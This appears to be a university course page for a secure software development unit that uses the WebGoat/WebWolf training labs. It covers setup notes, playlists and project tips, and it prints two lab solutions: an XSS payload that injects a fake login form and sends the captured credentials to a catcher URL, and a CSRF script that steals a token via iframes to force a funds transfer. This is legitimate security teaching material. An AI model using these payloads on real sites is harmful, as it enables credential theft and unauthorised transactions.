Contact: +6017-761 9288
Assessment: 100% Project (with NO TII requirement)
WebGoat & WebWolf:
Version 8 is now released
Version 6.0.1 link: http://webgoat.github.io
Version 5.4 Download link: https://code.google.com/p/webgoat/downloads/list
We will need a Tomcat server, with a MySQL database for this unit.
System Pre-requirement: JDK
The known problems:
Non-English Window OS conflict.
Running 2 instance of Tomcat at the same time.
Do not place WebGoat on the Desktop
Do not place WebGoat in the root C: drive
WebGoat 8 and WebWolf Playlist
https://www.youtube.com/playlist?list=PLrHVSJmDPvlqxCfBhPuksHdpViPyeZTsF
Chapter 1
We will be using these number of phases for our SDLC model.
Chapter 4
Chapter 9
Introduction to SQL
Cross-Site Scripting (XSS) - Phishing with XSS
</form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
Cross-Site Scripting (XSS) - Cross-Site Request Forgery (CSRF) - Token By-Pass
<script language="javascript">
<!--
var tokensuffix;
function readFrame1()
{
var frameDoc = document.getElementById("frame1").contentDocument;
var form = frameDoc.getElementsByTagName("form")[0];
tokensuffix = '&CSRFToken=' + form.CSRFToken.value;
loadFrame2();
}
function loadFrame2()
{
var testFrame = document.getElementById("frame2");
testFrame.src="http://localhost:8080/WebGoat/attack?Screen=275&menu=900&transferFunds=5000" + tokensuffix;
}
</script>
<iframe src="http://localhost:8080/WebGoat/attack?Screen=275&menu=900&transferFunds=main" onload="readFrame1();"id="frame1" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0" marginheight="0" width="800" scrolling=yes height="300"></iframe>
Webgoat 6 Playlist
https://www.youtube.com/playlist?list=PLrHVSJmDPvlrpEy7CXrD8GzNsHVk8FxAy
Project
Using Draw.IO for diagramming is a lot easier than drawing shapes and line in Word.
There is NO need to printout your documentation. Submission in softcopy.
Useful link: www.owasp.org
FAQ
Q: I have copied Java into my PC but I still can't get it to work properly.
A: Do a proper installation of your Java. If you just copy Java, the path and environment may not be set properly.
Special Thanks To
North Carolina State University
American Military University